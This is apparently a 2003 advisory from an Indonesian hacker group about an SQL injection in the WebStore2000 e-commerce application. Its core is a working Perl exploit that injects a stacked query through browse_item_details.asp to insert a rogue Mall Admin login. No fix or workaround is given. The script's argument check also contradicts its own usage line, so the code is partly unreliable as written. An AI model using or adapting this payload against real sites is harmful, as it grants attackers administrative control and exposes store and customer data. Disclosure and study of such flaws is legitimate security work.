1ndonesian Security Team (1st) http://bosen.net/releases/ ======================================================================= ======================= Security Advisory Advisory Name: WebStore SQL Injection Vulnerability & Exploit Release Date: 05/10/2003 Application: WebStore2000 Version 6.0/ for ISP Platform: Win32 Severity: High/Remote BUG Type: SQL Injection Author: Bosen <mobile@bosen.net> Discover by: Bosen <mobile@bosen.net> Vendor Status: Notified, see response below. Vendor URL: http://www.webcortex.com/ Reference: http://bosen.net/releases/ Overview: Webstores 2000 is a web based application. To run it, you will need a computer running a web server and connected to the internet. You can either run it yourself or host it with an ISP. Details: Even the code encrypted, and the error couse by SQL injection handled very good. But however the SQL injection still works fine with this application. The hole is on browse_item_details.asp. Exploits: ws2k-ex.pl _START_ #!/usr/bin/perl -w #This exploit create user with Mall Admin priv. #You can login via /MallAdmin/ $pamer = " 1ndonesian Security Team (1st) ============================== http://bosen.net/releases/ ws2k-ex.pl, WebStore2000 SQL Injection Proof of Concept Exploit by : Bosen Discover by : Bosen Greetz to : AresU, TioEuy, syzwz, TioEuy, sakitjiwa, muthafuka all #hackers\@centrin.net.id/austnet.org"; use LWP::UserAgent; use HTTP::Request; use HTTP::Response; $| = 1; print $pamer; if ($#ARGV<3){ print "\n Usage: perl ws2k-ex.pl <uri>\n\n"; exit; } my $legend = "$ARGV[0]/browse_item_details.asp?Item_ID="; $legend .= "''; insert into Mall_Logins values ('bosen','gembel')--"; my $bosen = LWP::UserAgent->new(); my $gembel = HTTP::Request->new(GET => $legend); my $dodol = $bosen->request($gembel); if ($dodol->is_error()) { printf " %s\n", $dodol->status_line; } else { print "Alhamdulillah :P\n"; } print "\n680165\n"; _EOF_ Vendor Response: The vendor provided BUG Forum, we post the bug but not in details with hope some of the developer response. But until now, theres no response. Recommendation: The application is new release. And the old version also vulnerability. So theres no recommendation until now. 1ndonesian Security Team (1st) Advisory: http://bosen.net/releases/ About 1ndonesian Security Team: 1ndonesian Security Team, research and develop intelligent, advanced application security assessment. Based in Indonesia, 1ndonesian Security Team offers best of breed security consulting services, specialising in application, host and network security assessments. 1st provides security information and patches for use by the entire 1st community. This information is provided freely to all interested parties and may be redistributed provided that it is not altered in any way, 1st is appropriately credited and the document retains. Greetz to: AresU, TioEuy, sakitjiwa, syzwz, and all 1ndonesian Security Team Bosen <mobile@bosen.net> ====================== Original document can be fount at http://bosen.net/releases/?id=30 ----------------------------------------------- This mail sent through http://webmail.bosen.net